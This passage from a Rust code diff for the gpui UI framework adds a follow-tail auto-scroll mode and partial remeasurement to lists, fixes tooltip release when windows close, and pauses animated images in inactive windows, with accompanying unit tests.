.timer(HOVERABLE_TOOLTIP_HIDE_DELAY) .await; + let Some(active_tooltip) = weak_active_tooltip.upgrade() else { + return; + }; if active_tooltip.borrow_mut().take().is_some() { cx.update(|window, _cx| window.refresh()).ok(); } @@ -3285,7 +3369,7 @@ impl ScrollAnchor { struct ScrollHandleState { offset: Rc>>, bounds: Bounds, - max_offset: Size, + max_offset: Point, child_bounds: Vec>, scroll_to_bottom: bool, overflow: Point, @@ -3329,7 +3413,7 @@ impl ScrollHandle { } /// Get the maximum scroll offset. - pub fn max_offset(&self) -> Size { + pub fn max_offset(&self) -> Point { self.0.borrow().max_offset } @@ -3504,6 +3588,112 @@ impl ScrollHandle { #[cfg(test)] mod tests { use super::*; + use crate::{AppContext as _, Context, InputEvent, MouseMoveEvent, TestAppContext}; + use std::rc::Weak; + + struct TestTooltipView; + + impl Render for TestTooltipView { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().w(px(20.)).h(px(20.)).child("tooltip") + } + } + + type CapturedActiveTooltip = Rc>>>>>; + + struct TooltipCaptureElement { + child: AnyElement, + captured_active_tooltip: CapturedActiveTooltip, + } + + impl IntoElement for TooltipCaptureElement { + type Element = Self; + + fn into_element(self) -> Self::Element { + self + } + } + + impl Element for TooltipCaptureElement { + type RequestLayoutState = (); + type PrepaintState = (); + + fn id(&self) -> Option { + None + } + + fn source_location(&self) -> Option<&'static core::panic::Location<'static>> { + None + } + + fn request_layout( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + window: &mut Window, + cx: &mut App, + ) -> (LayoutId, Self::RequestLayoutState) { + (self.child.request_layout(window, cx), ()) + } + + fn prepaint( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + _bounds: Bounds, + _request_layout: &mut Self::RequestLayoutState, + window: &mut Window, + cx: &mut App, + ) -> Self::PrepaintState { + self.child.prepaint(window, cx); + } + + fn paint( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + _bounds: Bounds, + _request_layout: &mut Self::RequestLayoutState, + _prepaint: &mut Self::PrepaintState, + window: &mut Window, + cx: &mut App, + ) { + self.child.paint(window, cx); + window.with_global_id("target".into(), |global_id, window| { + window.with_element_state::( + global_id, + |state, _window| { + let state = state.unwrap(); + *self.captured_active_tooltip.borrow_mut() = + state.active_tooltip.as_ref().map(Rc::downgrade); + ((), state) + }, + ) + }); + } + } + + struct TooltipOwner { + captured_active_tooltip: CapturedActiveTooltip, + } + + impl Render for TooltipOwner { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + TooltipCaptureElement { + child: div() + .size_full() + .child( + div() + .id("target") + .w(px(50.)) + .h(px(50.)) + .tooltip(|_, cx| cx.new(|_| TestTooltipView).into()), + ) + .into_any_element(), + captured_active_tooltip: self.captured_active_tooltip.clone(), + } + } + } #[test] fn scroll_handle_aligns_wide_children_to_left_edge() { @@ -3542,4 +3732,96 @@ mod tests { assert_eq!(handle.offset().y, px(-25.)); } + + fn setup_tooltip_owner_test() -> ( + TestAppContext, + crate::AnyWindowHandle, + CapturedActiveTooltip, + ) { + let mut test_app = TestAppContext::single(); + let captured_active_tooltip: CapturedActiveTooltip = Rc::new(RefCell::new(None)); + let window = test_app.add_window({ + let captured_active_tooltip = captured_active_tooltip.clone(); + move |_, _| TooltipOwner { + captured_active_tooltip, + } + }); + let any_window = window.into(); + + test_app + .update_window(any_window, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + + test_app + .update_window(any_window, |_, window, cx| { + window.dispatch_event( + MouseMoveEvent { + position: point(px(10.), px(10.)), + modifiers: Default::default(), + pressed_button: None, + } + .to_platform_input(), + cx, + ); + }) + .unwrap(); + + test_app + .update_window(any_window, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + + (test_app, any_window, captured_active_tooltip) + } + + #[test] + fn tooltip_waiting_for_show_is_released_when_its_owner_disappears() { + let (mut test_app, any_window, captured_active_tooltip) = setup_tooltip_owner_test(); + + let weak_active_tooltip = captured_active_tooltip.borrow().clone().unwrap(); + let active_tooltip = weak_active_tooltip.upgrade().unwrap(); + assert!(matches!( + active_tooltip.borrow().as_ref(), + Some(ActiveTooltip::WaitingForShow { .. }) + )); + + test_app + .update_window(any_window, |_, window, _| { + window.remove_window(); + }) + .unwrap(); + test_app.run_until_parked(); + drop(active_tooltip); + + assert!(weak_active_tooltip.upgrade().is_none()); + } + + #[test] + fn tooltip_is_released_when_its_owner_disappears() { + let (mut test_app, any_window, captured_active_tooltip) = setup_tooltip_owner_test(); + + let weak_active_tooltip = captured_active_tooltip.borrow().clone().unwrap(); + let active_tooltip = weak_active_tooltip.upgrade().unwrap(); + + test_app.dispatcher.advance_clock(TOOLTIP_SHOW_DELAY); + test_app.run_until_parked(); + + assert!(matches!( + active_tooltip.borrow().as_ref(), + Some(ActiveTooltip::Visible { .. }) + )); + + test_app + .update_window(any_window, |_, window, _| { + window.remove_window(); + }) + .unwrap(); + test_app.run_until_parked(); + drop(active_tooltip); + + assert!(weak_active_tooltip.upgrade().is_none()); + } } diff --git a/crates/gpui/src/elements/img.rs b/crates/gpui/src/elements/img.rs index 875f9e6dc1cc7d248f9e70488e52480dcca53fa3..ccd4123048c22fda796ec3ae9d367209d4974c38 100644 --- a/crates/gpui/src/elements/img.rs +++ b/crates/gpui/src/elements/img.rs @@ -315,20 +315,24 @@ impl Element for Img { if let Some(state) = &mut state { let frame_count = data.frame_count(); if frame_count > 1 { - let current_time = Instant::now(); - if let Some(last_frame_time) = state.last_frame_time { - let elapsed = current_time - last_frame_time; - let frame_duration = - Duration::from(data.delay(state.frame_index)); - - if elapsed >= frame_duration { - state.frame_index = - (state.frame_index + 1) % frame_count; - state.last_frame_time = - Some(current_time - (elapsed - frame_duration)); + if window.is_window_active() { + let current_time = Instant::now(); + if let Some(last_frame_time) = state.last_frame_time { + let elapsed = current_time - last_frame_time; + let frame_duration = + Duration::from(data.delay(state.frame_index)); + + if elapsed >= frame_duration { + state.frame_index = + (state.frame_index + 1) % frame_count; + state.last_frame_time = + Some(current_time - (elapsed - frame_duration)); + } + } else { + state.last_frame_time = Some(current_time); } } else { - state.last_frame_time = Some(current_time); + state.last_frame_time = None; } } state.started_loading = None; @@ -365,7 +369,10 @@ impl Element for Img { }; } - if global_id.is_some() && data.frame_count() > 1 { + if global_id.is_some() + && data.frame_count() > 1 + && window.is_window_active() + { window.request_animation_frame(); } } @@ -697,7 +704,7 @@ impl Asset for ImageAssetLoader { Ok(Arc::new(RenderImage::new(data))) } else { svg_renderer - .render_single_frame(&bytes, 1.0, true) + .render_single_frame(&bytes, 1.0) .map_err(Into::into) } } diff --git a/crates/gpui/src/elements/list.rs b/crates/gpui/src/elements/list.rs index 5403bf10eb9a078dfd113462644636b49d1840e4..5a88d81c18db5e790b7bbed0fb9def23bc973e14 100644 --- a/crates/gpui/src/elements/list.rs +++ b/crates/gpui/src/elements/list.rs @@ -72,6 +72,7 @@ struct StateInner { scrollbar_drag_start_height: Option, measuring_behavior: ListMeasuringBehavior, pending_scroll: Option, + follow_state: FollowState, } /// Keeps track of a fractional scroll position within an item for restoration @@ -83,6 +84,49 @@ struct PendingScrollFraction { fraction: f32, } +/// Controls whether the list automatically follows new content at the end. +#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)] +pub enum FollowMode { + /// Normal scrolling — no automatic following. + #[default] + Normal, + /// The list should auto-scroll along with the tail, when scrolled to bottom. + Tail, +} + +#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)] +enum FollowState { + #[default] + Normal, + Tail { + is_following: bool, + }, +} + +impl FollowState { + fn is_following(&self) -> bool { + matches!(self, FollowState::Tail { is_following: true }) + } + + fn has_stopped_following(&self) -> bool { + matches!( + self, + FollowState::Tail { + is_following: false + } + ) + } + + fn start_following(&mut self) { + if let FollowState::Tail { + is_following: false, + } = self + { + *self = FollowState::Tail { is_following: true }; + } + } +} + /// Whether the list is scrolling from top to bottom or bottom to top. #[derive(Clone, Copy, Debug, Eq, PartialEq)] pub enum ListAlignment { @@ -102,6 +146,9 @@ pub struct ListScrollEvent { /// Whether the list has been scrolled. pub is_scrolled: bool, + + /// Whether the list is currently in follow-tail mode (auto-scrolling to end). + pub is_following_tail: bool, } /// The sizing behavior to apply during layout. @@ -165,6 +212,7 @@ pub struct ListPrepaintState { #[derive(Clone)] enum ListItem { Unmeasured { + size_hint: Option>, focus_handle: Option, }, Measured { @@ -182,9 +230,16 @@ impl ListItem { } } + fn size_hint(&self) -> Option> { + match self { + ListItem::Measured { size, .. } => Some(*size), + ListItem::Unmeasured { size_hint, .. } => *size_hint, + } + } + fn focus_handle(&self) -> Option { match self { - ListItem::Unmeasured { focus_handle } | ListItem::Measured { focus_handle, .. } => { + ListItem::Unmeasured { focus_handle, .. } | ListItem::Measured { focus_handle, .. } => { focus_handle.clone() } } @@ -192,7 +247,7 @@ impl ListItem { fn contains_focused(&self, window: &Window, cx: &App) -> bool { match self { - ListItem::Unmeasured { focus_handle } | ListItem::Measured { focus_handle, .. } => { + ListItem::Unmeasured { focus_handle, .. } | ListItem::Measured { focus_handle, .. } => { focus_handle .as_ref() .is_some_and(|handle| handle.contains_focused(window, cx)) @@ -236,6 +291,7 @@ impl ListState { scrollbar_drag_start_height: None, measuring_behavior: ListMeasuringBehavior::default(), pending_scroll: None, + follow_state: FollowState::default(), }))); this.splice(0..0, item_count); this @@ -270,37 +326,63 @@ impl ListState { /// Use this when item heights may have changed (e.g., font size changes) /// but the number and identity of items remains the same. pub fn remeasure(&self) { - let state = &mut *self.0.borrow_mut(); + let count = self.item_count(); + self.remeasure_items(0..count); + } - let new_items = state.items.iter().map(|item| ListItem::Unmeasured { - focus_handle: item.focus_handle(), - }); + /// Mark items in `range` as needing remeasurement while preserving + /// the current scroll position. Unlike [`Self::splice`], this does + /// not change the number of items or blow away `logical_scroll_top`. + /// + /// Use this when an item's content has changed and its rendered + /// height may be different (e.g., streaming text, tool results + /// loading), but the item itself still exists at the same index. + pub fn remeasure_items(&self, range: Range) { + let state = &mut *self.0.borrow_mut(); - // If there's a `logical_scroll_top`, we need to keep track of it as a - // `PendingScrollFraction`, so we can later preserve that scroll - // position proportionally to the item, in case the item's height - // changes. + // If the scroll-top item falls within the remeasured range, + // store a fractional offset so the layout can restore the + // proportional scroll position after the item is re-rendered + // at its new height. if let Some(scroll_top) = state.logical_scroll_top { - let mut cursor = state.items.cursor::(()); - cursor.seek(&Count(scroll_top.item_ix), Bias::Right); - - if let Some(item) = cursor.item() { - if let Some(size) = item.size() { - let fraction = if size.height.0 > 0.0 { - (scroll_top.offset_in_item.0 / size.height.0).clamp(0.0, 1.0) - } else { - 0.0 - }; + if range.contains(&scroll_top.item_ix) { + let mut cursor = state.items.cursor::(()); + cursor.seek(&Count(scroll_top.item_ix), Bias::Right); - state.pending_scroll = Some(PendingScrollFraction { - item_ix: scroll_top.item_ix, - fraction, - }); + if let Some(item) = cursor.item() { + if let Some(size) = item.size() { + let fraction = if size.height.0 > 0.0 { + (scroll_top.offset_in_item.0 / size.height.0).clamp(0.0, 1.0) + } else { + 0.0 + }; + + state.pending_scroll = Some(PendingScrollFraction { + item_ix: scroll_top.item_ix, + fraction, + }); + } } } } - state.items = SumTree::from_iter(new_items, ()); + // Rebuild the tree, replacing items in the range with + // Unmeasured copies that keep their focus handles. + let new_items = { + let mut cursor = state.items.cursor::(()); + let mut new_items = cursor.slice(&Count(range.start), Bias::Right); + let invalidated = cursor.slice(&Count(range.end), Bias::Right); + new_items.extend( + invalidated.iter().map(|item| ListItem::Unmeasured { + size_hint: item.size_hint(), + focus_handle: item.focus_handle(), + }), + (), + ); + new_items.append(cursor.suffix(), ()); + new_items + }; + state.items = new_items; state.measuring_behavior.reset(); } @@ -334,7 +416,10 @@ impl ListState { new_items.extend( focus_handles.into_iter().map(|focus_handle| { spliced_count += 1; - ListItem::Unmeasured { focus_handle } + ListItem::Unmeasured { + size_hint: None, + focus_handle, + } }), (), ); @@ -377,6 +462,13 @@ impl ListState { let current_offset = self.logical_scroll_top(); let state = &mut *self.0.borrow_mut(); + + if distance < px(0.) { + if let FollowState::Tail { is_following } = &mut state.follow_state { + *is_following = false; + } + } + let mut cursor = state.items.cursor::(()); cursor.seek(&Count(current_offset.item_ix), Bias::Right); @@ -394,6 +486,54 @@ impl ListState { }); } + /// Scroll the list to the very end (past the last item). + /// + /// Unlike [`scroll_to_reveal_item`], this uses the total item count as the + /// anchor, so the list's layout pass will walk backwards from the end and + /// always show the bottom of the last item — even when that item is still + /// growing (e.g. during streaming). + pub fn scroll_to_end(&self) { + let state = &mut *self.0.borrow_mut(); + let item_count = state.items.summary().count; + state.logical_scroll_top = Some(ListOffset { + item_ix: item_count, + offset_in_item: px(0.), + }); + } + + /// Set the follow mode for the list. In `Tail` mode, the list + /// will auto-scroll to the end and re-engage after the user + /// scrolls back to the bottom. In `Normal` mode, no automatic + /// following occurs. + pub fn set_follow_mode(&self, mode: FollowMode) { + let state = &mut *self.0.borrow_mut(); + + match mode { + FollowMode::Normal => { + state.follow_state = FollowState::Normal; + } + FollowMode::Tail => { + state.follow_state = FollowState::Tail { is_following: true }; + if matches!(mode, FollowMode::Tail) { + let item_count = state.items.summary().count; + state.logical_scroll_top = Some(ListOffset { + item_ix: item_count, + offset_in_item: px(0.), + }); + } + } + } + } + + /// Returns whether the list is currently actively following the + /// tail (snapping to the end on each layout). + pub fn is_following_tail(&self) -> bool { + matches!( + self.0.borrow().follow_state, + FollowState::Tail { is_following: true } + ) + } + /// Scroll the list to the given offset pub fn scroll_to(&self, mut scroll_top: ListOffset) { let state = &mut *self.0.borrow_mut(); @@ -403,6 +543,12 @@ impl ListState { scroll_top.offset_in_item = px(0.); } + if scroll_top.item_ix < item_count { + if let FollowState::Tail { is_following } = &mut state.follow_state { + *is_following = false; + } + } + state.logical_scroll_top = Some(scroll_top); } @@ -491,20 +637,19 @@ impl ListState { /// Returns the maximum scroll offset according to the items we have measured. /// This value remains constant while dragging to prevent the scrollbar from moving away unexpectedly. - pub fn max_offset_for_scrollbar(&self) -> Size { + pub fn max_offset_for_scrollbar(&self) -> Point { let state = self.0.borrow(); - let bounds = state.last_layout_bounds.unwrap_or_default(); - - let height = state - .scrollbar_drag_start_height - .unwrap_or_else(|| state.items.summary().height); - - Size::new(Pixels::ZERO, Pixels::ZERO.max(height - bounds.size.height)) + point(Pixels::ZERO, state.max_scroll_offset()) } /// Returns the current scroll offset adjusted for the scrollbar pub fn scroll_px_offset_for_scrollbar(&self) -> Point { let state = &self.0.borrow(); + + if state.logical_scroll_top.is_none() && state.alignment == ListAlignment::Bottom { + return Point::new(px(0.), -state.max_scroll_offset()); + } + let logical_scroll_top = state.logical_scroll_top(); let mut cursor = state.items.cursor::(()); @@ -526,6 +671,14 @@ impl ListState { } impl StateInner { + fn max_scroll_offset(&self) -> Pixels { + let bounds = self.last_layout_bounds.unwrap_or_default(); + let height = self + .scrollbar_drag_start_height + .unwrap_or_else(|| self.items.summary().height); + (height - bounds.size.height).max(px(0.)) + } + fn visible_range( items: &SumTree, height: Pixels, @@ -574,6 +727,12 @@ impl StateInner { }); } + if let FollowState::Tail { is_following } = &mut self.follow_state { + if delta.y > px(0.) { + *is_following = false; + } + } + if let Some(handler) = self.scroll_handler.as_mut() { let visible_range = Self::visible_range(&self.items, height, scroll_top); handler( @@ -581,6 +740,10 @@ impl StateInner { visible_range, count: self.items.summary().count, is_scrolled: self.logical_scroll_top.is_some(), + is_following_tail: matches!( + self.follow_state, + FollowState::Tail { is_following: true } + ), }, window, cx, @@ -670,6 +833,15 @@ impl StateInner { let mut rendered_height = padding.top; let mut max_item_width = px(0.); let mut scroll_top = self.logical_scroll_top(); + + if self.follow_state.is_following() { + scroll_top = ListOffset { + item_ix: self.items.summary().count, + offset_in_item: px(0.), + }; + self.logical_scroll_top = Some(scroll_top); + } + let mut rendered_focused_item = false; let available_item_space = size( @@ -815,6 +987,18 @@ impl StateInner { new_items.append(cursor.suffix(), ()); self.items = new_items; + // If follow_tail mode is on but the user scrolled away + // (is_following is false), check whether the current scroll + // position has returned to the bottom. + if self.follow_state.has_stopped_following() { + let padding = self.last_padding.unwrap_or_default(); + let total_height = self.items.summary().height + padding.top + padding.bottom; + let scroll_offset = self.scroll_top(&scroll_top); + if scroll_offset + available_height >= total_height - px(1.0) { + self.follow_state.start_following(); + } + } + // If none of the visible items are focused, check if an off-screen item is focused // and include it to be rendered after the visible items so keyboard interaction continues // to work for it. @@ -951,6 +1135,8 @@ impl StateInner { content_height - self.scrollbar_drag_start_height.unwrap_or(content_height); let new_scroll_top = (point.y - drag_offset).abs().max(px(0.)).min(scroll_max); + self.follow_state = FollowState::Normal; + if self.alignment == ListAlignment::Bottom && new_scroll_top == scroll_max { self.logical_scroll_top = None; } else { @@ -1097,12 +1283,14 @@ impl Element for List { { let new_items = SumTree::from_iter( state.items.iter().map(|item| ListItem::Unmeasured { + size_hint: None, focus_handle: item.focus_handle(), }), (), ); state.items = new_items; + state.measuring_behavior.reset(); } let padding = style @@ -1182,11 +1370,18 @@ impl sum_tree::Item for ListItem { fn summary(&self, _: ()) -> Self::Summary { match self { - ListItem::Unmeasured { focus_handle } => ListItemSummary { + ListItem::Unmeasured { + size_hint, + focus_handle, + } => ListItemSummary { count: 1, rendered_count: 0, unrendered_count: 1, - height: px(0.), + height: if let Some(size) = size_hint { + size.height + } else { + px(0.) + }, has_focus_handles: focus_handle.is_some(), }, ListItem::Measured { @@ -1256,8 +1451,8 @@ mod test { use std::rc::Rc; use crate::{ - self as gpui, AppContext, Context, Element, IntoElement, ListState, Render, Styled, - TestAppContext, Window, div, list, point, px, size, + self as gpui, AppContext, Context, Element, FollowMode, IntoElement, ListState, Render, + Styled, TestAppContext, Window, div, list, point, px, size, }; #[gpui::test] @@ -1348,6 +1543,41 @@ mod test { assert_eq!(offset.offset_in_item, px(0.)); } + #[gpui::test] + fn test_measure_all_after_width_change(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + // First draw at width 100: all 10 items measured (total 500px). + // Viewport is 200px, so max scroll offset should be 300px. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert_eq!(state.max_offset_for_scrollbar().y, px(300.)); + + // Second draw at a different width: items get invalidated. + // Without the fix, max_offset would drop because unmeasured items + // contribute 0 height. + cx.draw(point(px(0.), px(0.)), size(px(200.), px(200.)), |_, _| { + view.into_any_element() + }); + assert_eq!(state.max_offset_for_scrollbar().y, px(300.)); + } + #[gpui::test] fn test_remeasure(cx: &mut TestAppContext) { let cx = cx.add_empty_window(); @@ -1413,4 +1643,454 @@ mod test { assert_eq!(offset.item_ix, 2); assert_eq!(offset.offset_in_item, px(20.)); } + + #[gpui::test] + fn test_follow_tail_stays_at_bottom_as_items_grow(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items, each 50px tall → 500px total content, 200px viewport. + // With follow-tail on, the list should always show the bottom. + let item_height = Rc::new(Cell::new(50usize)); + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView { + state: ListState, + item_height: Rc>, + } + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + let height = self.item_height.get(); + list(self.state.clone(), move |_, _, _| { + div().h(px(height as f32)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let state_clone = state.clone(); + let item_height_clone = item_height.clone(); + let view = cx.update(|_, cx| { + cx.new(|_| TestView { + state: state_clone, + item_height: item_height_clone, + }) + }); + + state.set_follow_mode(FollowMode::Tail); + + // First paint — items are 50px, total 500px, viewport 200px. + // Follow-tail should anchor to the end. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // The scroll should be at the bottom: the last visible items fill the + // 200px viewport from the end of 500px of content (offset 300px). + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 6); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(state.is_following_tail()); + + // Simulate items growing (e.g. streaming content makes each item taller). + // 10 items × 80px = 800px total. + item_height.set(80); + state.remeasure(); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + // After growth, follow-tail should have re-anchored to the new end. + // 800px total − 200px viewport = 600px offset → item 7 at offset 40px, + // but follow-tail anchors to item_count (10), and layout walks back to + // fill 200px, landing at item 7 (7 × 80 = 560, 800 − 560 = 240 > 200, + // so item 8: 8 × 80 = 640, 800 − 640 = 160 < 200 → keeps walking → + // item 7: offset = 800 − 200 = 600, item_ix = 600/80 = 7, remainder 40). + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 7); + assert_eq!(offset.offset_in_item, px(40.)); + assert!(state.is_following_tail()); + } + + #[gpui::test] + fn test_follow_tail_disengages_on_user_scroll(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + state.set_follow_mode(FollowMode::Tail); + + // Paint with follow-tail — scroll anchored to the bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, cx| { + cx.new(|_| TestView(state.clone())).into_any_element() + }); + assert!(state.is_following_tail()); + + // Simulate the user scrolling up. + // This should disengage follow-tail. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(100.))), + ..Default::default() + }); + + assert!( + !state.is_following_tail(), + "follow-tail should disengage when the user scrolls toward the start" + ); + } + + #[gpui::test] + fn test_follow_tail_disengages_on_scrollbar_reposition(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + // Paint with follow-tail — scroll anchored to the bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Simulate the scrollbar moving the viewport to the middle. + // `set_offset_from_scrollbar` accepts a positive distance from the start. + state.set_offset_from_scrollbar(point(px(0.), px(150.))); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + assert!( + !state.is_following_tail(), + "follow-tail should disengage when the scrollbar manually repositions the list" + ); + + // A subsequent draw should preserve the user's manual position instead + // of snapping back to the end. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + } + + #[gpui::test] + fn test_set_follow_tail_snaps_to_bottom(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + // Scroll to the middle of the list (item 3). + state.scroll_to(gpui::ListOffset { + item_ix: 3, + offset_in_item: px(0.), + }); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(!state.is_following_tail()); + + // Enable follow-tail — this should immediately snap the scroll anchor + // to the end, like the user just sent a prompt. + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + // After paint, scroll should be at the bottom. + // 500px total − 200px viewport = 300px offset → item 6, offset 0. + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 6); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(state.is_following_tail()); + } + + #[gpui::test] + fn test_bottom_aligned_scrollbar_offset_at_end(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + const ITEMS: usize = 10; + const ITEM_SIZE: f32 = 50.0; + + let state = ListState::new( + ITEMS, + crate::ListAlignment::Bottom, + px(ITEMS as f32 * ITEM_SIZE), + ); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(ITEM_SIZE)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(100.)), |_, cx| { + cx.new(|_| TestView(state.clone())).into_any_element() + }); + + // Bottom-aligned lists start pinned to the end: logical_scroll_top returns + // item_ix == item_count, meaning no explicit scroll position has been set. + assert_eq!(state.logical_scroll_top().item_ix, ITEMS); + + let max_offset = state.max_offset_for_scrollbar(); + let scroll_offset = state.scroll_px_offset_for_scrollbar(); + + assert_eq!( + -scroll_offset.y, max_offset.y, + "scrollbar offset ({}) should equal max offset ({}) when list is pinned to bottom", + -scroll_offset.y, max_offset.y, + ); + } + + /// When the user scrolls away from the bottom during follow_tail, + /// follow_tail suspends. If they scroll back to the bottom, the + /// next paint should re-engage follow_tail using fresh measurements. + #[gpui::test] + fn test_follow_tail_reengages_when_scrolled_back_to_bottom(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Scroll up — follow_tail should suspend (not fully disengage). + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(50.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Scroll back down to the bottom. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + // After a paint, follow_tail should re-engage because the + // layout confirmed we're at the true bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + state.is_following_tail(), + "follow_tail should re-engage after scrolling back to the bottom" + ); + } + + /// When an item is spliced to unmeasured (0px) while follow_tail + /// is suspended, the re-engagement check should still work correctly + #[gpui::test] + fn test_follow_tail_reengagement_not_fooled_by_unmeasured_items(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 20 items × 50px = 1000px total, 200px viewport, 1000px + // overdraw so all items get measured during the follow_tail + // paint (matching realistic production settings). + let state = ListState::new(20, crate::ListAlignment::Top, px(1000.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Scroll up a meaningful amount — suspends follow_tail. + // 20 items × 50px = 1000px. viewport 200px. scroll_max = 800px. + // Scrolling up 200px puts us at 600px, clearly not at bottom. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(200.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Invalidate the last item (simulates EntryUpdated calling + // remeasure_items). This makes items.summary().height + // temporarily wrong (0px for the invalidated item). + state.remeasure_items(19..20); + + // Paint — layout re-measures the invalidated item with its true + // height. The re-engagement check uses these fresh measurements. + // Since we scrolled 200px up from the 800px max, we're at + // ~600px — NOT at the bottom, so follow_tail should NOT + // re-engage. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + !state.is_following_tail(), + "follow_tail should not falsely re-engage due to an unmeasured item \ + reducing items.summary().height" + ); + } + + /// Calling `set_follow_mode(FollowState::Normal)` or 